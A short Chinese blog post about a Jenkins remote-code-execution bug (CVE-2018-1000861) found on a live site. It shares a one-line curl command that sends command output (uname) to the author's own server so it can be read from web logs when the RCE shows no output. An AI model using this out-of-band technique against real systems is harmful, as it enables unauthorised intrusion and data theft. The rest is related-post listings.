无回显RCE的一个小tip

作者: Your7Maxx | 来源:发表于2021-03-08 15:31 被阅读0次

无回显RCE的一个小tip
Apache Shiro RememberMe 反序列化
THINKPHP5 远程命令执行
SQL注入
在 Xcode 中优化 todo 的 5 个小 Tip
TP5_RCE合集
【白盒】TP5_RCE合集
小tip
小tip
bat常用命令

今天在挖洞的时候碰到一个jenkins的站点，老版本了，存在RCE，CVE版本号为CVE-2018-1000861
由于是实战，所以就不描述详细过程了，最后并没有成功弹回shell..但也证明确实有RCE。
中间出现个小插曲，学习到了一个比较骚的技巧。
因为该RCE比较特殊，并不出现回显。所以求救了师哥，师哥给了一个命令拼接的技巧：

curl xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')"

这条命令拼接了两处，第一处便是curl下我的一个vps服务器的80端口，第二处是显示内核版本。从服务器的web日志文件中看下效果：

image.png

发现操作系统的版本被拼接输出到后面，在面对没有回显的RCE或者CSRF都可以使用这个技巧。

无回显RCE的一个小tip
今天在挖洞的时候碰到一个jenkins的站点，老版本了，存在RCE，CVE版本号为CVE-2018-1000861...
Apache Shiro RememberMe 反序列化
漏洞背景 CVE-2016-4437/shiro-550，shiro<1.2.4,前台无回显RCE。框架介绍：A...
THINKPHP5 远程命令执行
漏洞背景前台有回显RCE 框架介绍：ThinkPHP是一款运用极广的PHP开发框架。漏洞引入：1.其版本5中，由...
SQL注入
用户输入数据被当成了代码被执行原则有回显:union select、报错注入无回显:dnslog, time-ba...
在 Xcode 中优化 todo 的 5 个小 Tip
在 Xcode 中优化 todo 的 5 个小 Tip在 Xcode 中优化 todo 的 5 个小 Tip
TP5_RCE合集
目录一、控制器名引起的RCE二、核心类Requests引起的RCE 一、控制器名引起的RCE 公开时间：2018/...
【白盒】TP5_RCE合集
目录一、控制器名引起的RCE二、核心类Requests引起的RCE 一、控制器名引起的RCE 公开时间：2018/...
小tip
在命令行里面添加文本按键盘i键转换到文本输入输入文本输入完毕，按ESC 键，然后按:wq 保存后退出友盟分享中...
小tip
今天早晨的电梯里很拥挤，出来电梯后我却特别注意到一个男士的上衣背面衣服上沾了一长条白色的胶带状的东西，再一看，被隐...
bat常用命令
echo 回显[ON | OFF] 打开回显或关闭回显功能。echo xxx 回显xxx set设置变量,注意...